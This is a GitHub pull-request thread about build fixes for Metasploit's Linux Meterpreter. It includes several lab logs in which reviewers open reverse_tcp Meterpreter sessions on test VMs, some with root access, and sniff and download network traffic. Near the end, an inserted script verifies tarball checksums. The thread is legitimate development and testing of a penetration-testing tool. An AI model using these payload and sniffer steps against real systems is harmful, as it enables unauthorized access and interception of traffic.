This repository has been archived by the owner on Jan 22, 2024. It is now read-only.

support building on newer Linux systems and Makefile cleanups #116

Merged
merged 3 commits into from
Jan 16, 2015

bcook-r7
Contributor

This fixes some issues building Meterpreter under recent linux distributions and quiets some of the noise to make further development feasible.

  • try to share some bits between different makefiles, make modifying global compiler flags not such a huge pain.
  • directly specify we should be using the gold rather than bpf linker
  • make compiler output largely quiet except where we care - allow warnings to actually be visible
  • don't delete downloaded tarballs with --really-clean
  • add missing dependencies between libraries (--no-add-needed/--no-copy-dt-needed-entries causes lots of trouble)
  • update readme to show what to install to build

I made minimal changes to the loader makefile - it breaks easily.
-Os prevents it from being able to load libc, for instance

Verification Steps

On Ubuntu 14.04 or Fedora 21 x64, try these things:

  • install recommended packages in the README.md file
  • run 'make really-clean && make && make install'
  • verify that it runs and installs new binaries in your metasploit-framework directory
  • verify that you can start a meterpreter shell
  • load networkpug
  • load sniffer

Build should look a little nicer, it stashes a lot of the 3rd party build noise into log files:

$ make
Building libc
Building libm
Building libdl
Building OpenSSL
Installing libcrypto
Installing libssl
make -C workspace/common
make[1]: Entering directory `/home/bcook/projects/meterpreter/workspace/common'
[CC] args.o
[CC] base.o
[CC] unix_socket_server.o
[CC] passfd_server.o
[CC] ptrace.o
[CC] base_inject.o
[CC] base_dispatch.o
[CC] base_dispatch_common.o
[CC] buffer.o
[CC] channel.o
[CC] common.o

Though the extensive use of 'HANDLE' in a unix environment is imperfect, so there are lots of bad casts and things that will be solved later. My editor also auto-deletes trailing whitespace on save, so sorry in advance for the noise.

@bcook-r7
Contributor Author

This addresses #114 and #115

@bcook-r7
Contributor Author

Hmm, it failed on whatever travis runs - time to play whack-a-build :)

@metasploit-public-bot

Test PASSED.
Refer to this link for build results (access rights to CI server needed):
https://ci.metasploit.com//job/GPR-MeterpreterWin/139/
Test PASSED.

@metasploit-public-bot

Test PASSED.
Refer to this link for build results (access rights to CI server needed):
https://ci.metasploit.com//job/GPR-MeterpreterWin/140/
Test PASSED.

@jvazquez-r7
Contributor

Giving a chance to it!

@jvazquez-r7 jvazquez-r7 self-assigned this Jan 16, 2015
@jvazquez-r7
Contributor

  • Compiled okay with Ubuntu 10.04, and tested successfully on Ubuntu 10.04:
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(handler) > run

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1142784 bytes) to 172.16.158.221
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.221:39574) at 2015-01-16 15:20:33 -0600

meterpreter > load sniffer
Loading extension sniffer...success.
meterpreter > sniffer_start 3
[*] Capture started on interface 3 (50000 packet buffer)
meterpreter > sniffer_stats 3
[*] Capture statistics for interface 3
    packets: 593
    bytes: 76093
meterpreter > sniffer_stop 3
[*] Capture stopped on interface 3
[*] There are 593 packets (76093 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter > sniffer_dump 3 /tmp/test.pcap
[*] Flushing packet capture buffer for interface 3...
[*] Flushed 593 packets (87953 bytes)
[*] Downloaded 100% (87953/87953)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/test.pcap
meterpreter >

I need to compile on different platforms and test some Ubuntu / Fedora versions, will land if no stoppers, looks good to me =)

@jvazquez-r7
Contributor

Working on fedora 15:

msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1142784 bytes) to 172.16.158.193
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.193:55058) at 2015-01-16 15:27:43 -0600

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
meterpreter > load sniffer
Loading extension sniffer...success.
meterpreter > load networkplug
Loading extension networkplug...
[-] Failed to load extension: No module of the name ext_server_networkplug.lso found
meterpreter > load networkpug
Loading extension networkpug...success.
meterpreter > sniffer_interfaces

1 - 'eth0' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
2 - 'any' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
3 - 'lo' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )

meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_
sniffer_dump        sniffer_interfaces  sniffer_release     sniffer_start       sniffer_stats       sniffer_stop
meterpreter > sniffer_stats 2
[*] Capture statistics for interface 2
    packets: 1322
    bytes: 183564
meterpreter > sniffer_stop 2
[*] Capture stopped on interface 2
[*] There are 1324 packets (183682 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter > sniffer_dump 2
[-] Usage: sniffer_dump [interface-id] [pcap-file]
meterpreter > sniffer_dump 2 /tmp/test2.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 1324 packets (210162 bytes)
[*] Downloaded 100% (210162/210162)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/test2.pcap
meterpreter >

@jvazquez-r7
Contributor

Fedora 20 (64 bits)

msf exploit(handler) > run

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1142784 bytes) to 172.16.158.211
[*] Meterpreter session 3 opened (172.16.158.1:4444 -> 172.16.158.211:58593) at 2015-01-16 15:45:04 -0600
i
meterpreter > interfaces
[-] Unknown command: interfaces.
meterpreter > load sniffer
Loading extension sniffer...success.
meterpreter > sniffer_interfaces

1 - 'eno16777736' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
2 - 'any' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
3 - 'lo' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )

meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_stats 2
[*] Capture statistics for interface 2
    packets: 39
    bytes: 3108
meterpreter > sniffer_stop 2
[*] Capture stopped on interface 2
[*] There are 41 packets (3232 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter > sniffer_dump 2 /tmp/test3.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 41 packets (4052 bytes)
[*] Downloaded 100% (4052/4052)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/test3.pcap
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.211 - Meterpreter session 3 closed.  Reason: User exit

@jvazquez-r7
Contributor

Ubuntu 14.04:

msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1142784 bytes) to 172.16.158.197
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.197:59951) at 2015-01-16 16:01:07 -0600

meterpreter > load sniffer
Loading extension sniffer...success.
gmeterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
meterpreter > sniffer_interfaces

1 - 'eth0' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
2 - 'any' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
3 - 'lo' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )

meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_stats 2
s[*] Capture statistics for interface 2
    packets: 23
    bytes: 1904
meterpreter > sniffer_stop 2
snif[*] Capture stopped on interface 2
[*] There are 26 packets (2090 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter > sniffer_dump 2 /tmp/test4.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 26 packets (2610 bytes)
[*] Downloaded 100% (2610/2610)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/test4.pcap
meterpreter > exit
[*] Shutting down Meterpreter...

Coolio! :-) I'm trying to compile on other systems now!

@jvazquez-r7
Contributor

  • Binaries compiled successfully on Ubuntu 14.04:
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1236992 bytes) to 172.16.158.197
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.197:59958) at 2015-01-16 16:28:44 -0600

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
meterpreter > load sniffer
Loading extension sniffer...success.
meterpreter > show options
[-] Unknown command: show.
meterpreter > load networkpug
Loading extension networkpug...success.
meterpreter > sniffer_
sniffer_dump        sniffer_interfaces  sniffer_release     sniffer_start       sniffer_stats       sniffer_stop
meterpreter > sniffer_interfaces

1 - 'eth0' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
2 - 'any' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
3 - 'lo' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )

meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_stats 2
[*] Capture statistics for interface 2
    packets: 12
    bytes: 1074
meterpreter > sniffer_stop 2
^[[A[*] Capture stopped on interface 2
[*] There are 14 packets (1180 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter > sniffer_dump 2 /tmp/test33.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 14 packets (1460 bytes)
[*] Downloaded 100% (1460/1460)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/test33.pcap
meterpreter >

=)

@jvazquez-r7
Contributor

When compiling on fedora 15:

$ make
cc1: error: unrecognized command line option ‘-fuse-ld=gold’

Which, according to what I discussed with @bcook-r7, makes sense. Honestly I feel like it's better to have meterpreter compiling without special tweaking/problems on modern distributions, even when the use-ld option might not be available on older distributions with older gcc toolchains...

@jvazquez-r7
Contributor

Build on Fedora 20 has been successful:

The built binaries work on fedora:

msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...



[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1245184 bytes) to 172.16.158.189
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.189:36397) at 2015-01-16 16:45:04 -0600

meterpreter >
meterpreter >
meterpreter >
meterpreter > load
load networkpug  load sniffer
meterpreter > load networkpug
Loading extension networkpug...success.
meterpreter > load sniffer
Loading extension sniffer...success.
meterpreter > sniffer_interfaces

1 - 'eno16777736' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
2 - 'any' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
3 - 'lo' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )

meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_
sniffer_dump        sniffer_interfaces  sniffer_release     sniffer_start       sniffer_stats       sniffer_stop
meterpreter > sniffer_
sniffer_dump        sniffer_interfaces  sniffer_release     sniffer_start       sniffer_stats       sniffer_stop
meterpreter > sniffer_stats 2
[*] Capture statistics for interface 2
    packets: 10
    bytes: 883
meterpreter > sniffer_stop 2
sniffer_[*] Capture stopped on interface 2
[*] There are 10 packets (883 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter > sniffer_dump 2 /tmp/more.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 10 packets (1083 bytes)
[*] Downloaded 100% (1083/1083)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/more.pcap
meterpreter >

And ubuntu 14.04:

msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1245184 bytes) to 172.16.158.197
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.197:59959) at 2015-01-16 16:47:19 -0600

gmeterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
smeterpreter > sysinfo
Computer     : ubuntu
OS           : Linux ubuntu 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:08:14 UTC 2014 (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter > load sniffer
Loading extension sniffer...success.
meterpreter > load networkpug
Loading extension networkpug...success.
meterpreter > sniffer_interfaces

1 - 'eth0' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
2 - 'any' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
3 - 'lo' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )

meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_stats
[-] Usage: sniffer_stats [interface-id]
meterpreter > sniffer_start 2
[-] sniffer_capture_start: Operation failed: 22
meterpreter > sniffer_stats 2
[*] Capture statistics for interface 2
    packets: 2
    bytes: 198
meterpreter > sniffer_stats 2
[*] Capture statistics for interface 2
    packets: 12
    bytes: 1166
meterpreter > sniffer_stop 2
[*] Capture stopped on interface 2
[*] There are 12 packets (1166 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter > sniffer_dump 2 /tmp/more.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 12 packets (1406 bytes)
[*] Downloaded 100% (1406/1406)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/more.pcap
meterpreter >

@jvazquez-r7
Copy link
Contributor

Definitely it's much better than the actual build I think, even when the build will fail on older gcc chains (see Fedora 15). Maybe it's worth adding some documentation to the Readme.md with some guidance about where to build the linux flavor of meterpreter =)

@jvazquez-r7 jvazquez-r7 merged commit 72af01a into rapid7:master Jan 16, 2015
@OJ
Contributor

OJ commented Jan 16, 2015

Very nice

@bcook-r7
Contributor Author

Hmm, I thought I took care of older compilers with this one little trick that dentists hate: 9c15923

That was largely to make Travis CI happy, guess I missed a spot.

@jvazquez-r7
Contributor

@bcook-r7 ooom damnit maybe my fault, stopped the build after seeing that message. Re-ran it and got a wget stopper after that message..., really? xD

  • Fedora 15 32 bits (full build output)
$ make
cc1: error: unrecognized command line option ‘-fuse-ld=gold’
Building libc
Building libm
Building libdl
Building OpenSSL
--2014-06-26 15:59:05--  https://www.openssl.org/source/openssl-0.9.8za.tar.gz
Resolving www.openssl.org... 185.9.166.106
Connecting to www.openssl.org|185.9.166.106|:443... connected.
ERROR: cannot verify www.openssl.org’s certificate, issued by “/C=BE/O=GlobalSign nv-sa/CN=GlobalSign Domain Validation CA - SHA256 - G2”:
  Issued certificate not yet valid.
To connect to www.openssl.org insecurely, use ‘--no-check-certificate’.
make: *** [posix-meterp-build-tmp/openssl-0.9.8za/libssl.so] Error 5

@jvazquez-r7
Contributor

maybe it couldn't verify the current openssl certificate at that time :? I dunno for sure...

@bcook-r7
Contributor Author

Nah, fedora 15 probably really has outdated SSL certs and actually can't verify properly. But, it feels wrong to download an SSL library without checking its validity. Would anyone get mad if I just checked in the darn tarballs somewhere?

The first message is just the makefile checking if -fuse-ld-gold is accepted by the compiler, not an actual error :)
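
One way to act on the concern raised above about fetching the OpenSSL source without validating it, as an added example that is not part of the original thread or the project's Makefile: pin SHA-256 digests in the repository and refuse to build from a download that does not match. The function names, the `SHA256SUMS` manifest name and the stand-in file are assumptions made for this illustration.

```shell
# Added example (hypothetical names): check downloads against pinned SHA-256 digests.

# sha256_of FILE: print the lowercase hex SHA-256 of FILE.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    elif command -v shasum >/dev/null 2>&1; then
        shasum -a 256 "$1" | awk '{print $1}'
    else
        openssl dgst -sha256 "$1" | awk '{print $NF}'
    fi
}

# verify_tarball FILE PINNED_SHA256
# Returns 0 on match, 1 on mismatch, 2 if FILE is missing or the pin is malformed.
verify_tarball() {
    file=$1
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    [ -f "$file" ] || { echo "verify: $file: not found" >&2; return 2; }
    printf '%s\n' "$expected" | grep -Eq '^[0-9a-f]{64}$' ||
        { echo "verify: pin for $file is not 64 hex characters" >&2; return 2; }
    actual=$(sha256_of "$file")
    if [ "$actual" != "$expected" ]; then
        echo "verify: $file: digest mismatch (pinned $expected, got $actual)" >&2
        return 1
    fi
}

# verify_manifest MANIFEST DIR
# MANIFEST lines are "<sha256>  <filename>"; blank lines and '#' comments are skipped.
# Every entry is checked; returns 1 if any entry fails.
verify_manifest() {
    manifest=$1 dir=$2 rc=0
    while read -r digest name || [ -n "$digest" ]; do
        case $digest in ''|'#'*) continue ;; esac
        verify_tarball "$dir/$name" "$digest" || rc=1
    done < "$manifest"
    return $rc
}

# Constructed demo: pin a stand-in file, verify it, then alter it and verify again.
demo() {
    tmp=$(mktemp -d) || return 2
    f=$tmp/example-src.tar.gz
    printf 'constructed stand-in for a source tarball\n' > "$f"
    printf '# constructed pins\n%s  example-src.tar.gz\n' "$(sha256_of "$f")" > "$tmp/SHA256SUMS"
    intact=0; verify_manifest "$tmp/SHA256SUMS" "$tmp" || intact=$?
    printf 'x' >> "$f"    # simulate a download that differs from the pinned release
    tampered=0; verify_manifest "$tmp/SHA256SUMS" "$tmp" 2>/dev/null || tampered=$?
    rm -rf "$tmp"
    echo "intact=$intact tampered=$tampered"
    [ "$intact" -eq 0 ] && [ "$tampered" -eq 1 ]
}

demo
```

In a Makefile the check would sit between the download step and the unpack step, with the manifest committed alongside the build files.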

@jvazquez-r7
Contributor

@bcook-r7 coolio :-) so that's all! Really nice PR!

@hdm

hdm commented Jan 17, 2015

@bcook-r7 Does this support building binaries that run on really old kernels? (2.4.x)

@jvazquez-r7
Contributor

@hmoore-r7 @bcook-r7 wanted to say yes :P, but I had to check... I'm a coward...

msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1236992 bytes) to 172.16.158.134
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.134:32777) at 2015-01-16 20:03:25 -0600

meterpreter > getuid
sServer username: uid=500, gid=500, euid=500, egid=500, suid=500, sgid=500
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux localhost.localdomain 2.4.21-52.EL #1 Fri Sep 28 13:48:28 CDT 2007 (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter >

@jvazquez-r7
Contributor

@bcook-r7 @hmoore-r7 binaries can be tested from this branch rapid7/metasploit-framework#4600

btw, @bcook-r7 should review that PR, just to be sure the binaries I'm attaching are good, or if there is just a procedure I'm forgetting to update binaries :)

@hdm

hdm commented Jan 17, 2015

@jvazquez-r7 thanks!

bcook-r7 pushed a commit to busterb/metasploit-framework that referenced this pull request Feb 10, 2015
Hopefully the last manual build before packaging the Linux bins into
meterpreter_bins as well.

This includes all of the fixes and improvements over the past month.

 rapid7/meterpreter#116
 rapid7/meterpreter#117
 rapid7/meterpreter#121
 rapid7/meterpreter#124